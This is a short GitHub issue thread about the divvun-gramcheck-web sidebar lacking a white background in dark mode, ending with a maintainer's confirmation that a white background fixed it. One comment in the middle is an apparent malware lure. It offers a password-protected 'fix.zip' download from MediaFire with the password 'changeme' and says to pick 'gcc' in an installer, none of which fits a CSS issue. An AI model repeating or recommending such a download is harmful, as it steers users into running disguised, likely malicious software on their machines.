### ISSUE TITLE
Sidebar background color

### ISSUE THREAD

**Issue by TinoDidriksen** [divvun/divvun-gramcheck-web#93]
The sidebar HTML must have an explicit white background, or full CSS dark mode support. This is what it looks like in dark mode:

![2024-08-28 (1)](https://github.com/user-attachments/assets/441f91b9-1d05-4c19-9007-e4b235b86e2c)

**Comment by LC-JiaZhaorong** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by snomos** [comment]
I can confirm it is fixed with an explicit white background. Proper dark mode support will probably be added later, but this will do for now.
